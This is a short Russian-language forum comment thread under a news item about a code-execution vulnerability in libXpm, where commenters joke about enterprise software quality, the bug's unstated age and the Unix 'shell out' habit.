:D :D :D :D :D Не реально смешно. Чел никогда не видел ынтерплайза? Зачастую, он чуть меньше чем полностью состоит из 7 колёсных велосипедов.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 01:42 
> Врачи пишут планировщики задач, студни и всякие бoмжы пишут свои утилитки "лишь бы работало", потом приходят другие и лепят на основе этих поделок что-то свое, потом это слепливают в большой дурнопахнущий ком и выкладывают в прод.

Святая наивность, ты никогда не видел коммерческой разработки изнутри.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 12:01 
https://xkcd.com/2347/

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Alex , 22-Янв-23 06:13 
Странно, что не написали сколько лет этой уязвимости....

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 08:11 
Или им было стыдно это писать,
или все кто знал уже ущли на пенсию.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 23-Янв-23 00:15 
замена системных экзешников на троянов? Да постарше тебя уж.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 25-Янв-23 05:12 
Угар, конечно, как в тут
папуасы ругают классику программирования под юникс — т.н. shell out. А ведь это неотъемлемая часть «юникс-философии», за которую в комментариях порой убить готовы. Как же так выходит, половина комментаторов TAOUP не читала? Грешновато.